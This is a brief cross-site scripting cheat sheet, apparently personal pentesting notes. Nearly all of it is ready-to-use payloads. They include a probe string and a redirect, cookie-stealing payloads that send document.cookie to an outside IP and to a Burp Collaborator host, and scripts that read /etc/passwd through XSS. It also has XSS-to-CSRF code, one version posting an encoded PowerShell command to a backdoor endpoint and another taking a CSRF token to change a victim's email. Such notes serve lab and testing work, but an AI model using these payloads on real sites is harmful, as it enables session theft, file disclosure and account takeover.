XSS

Cross-Site Scripting

Ultimate checker: '"/><script>print()</script>.

Redirections

https://developer.mozilla.org/ru/docs/Web/HTTP/Redirections

<head> 
  <meta http-equiv="refresh" content="0; URL=http://www.example.com/" />
</head>

Data Grabbers

Cookies

https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies

Img tag:

<img src="x" onerror="this.src='http://10.10.15.123/?c='+btoa(document.cookie)">

Fetch:

<script>
fetch('https://<SESSION>.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>

XMLHttpRequest

XSS to LFI

https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html

<script>
var xhr = new XMLHttpRequest;
xhr.onload = function() {
	document.write(this.responseText);
};
xhr.open("GET", "file:///etc/passwd");
xhr.send();
</script>

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText);};x.open("GET","file:///etc/passwd");x.send();</script>

XSS to CSRF

https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf

If the endpoint is accessible only from localhost:

<script>
var xhr;
if (window.XMLHttpRequest) {
	xhr = new XMLHttpRequest();
} else {
	xhr = new ActiveXObject("Microsoft.XMLHTTP");
}
xhr.open("POST", "/backdoor.php");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send("cmd=powershell -enc ...");
</script>

With capturing CSRF token first:

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/email', true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('POST', '/email/change-email', true);
    changeReq.send('csrf='+token+'&[email protected]')
};
</script>

Last updated 4 years ago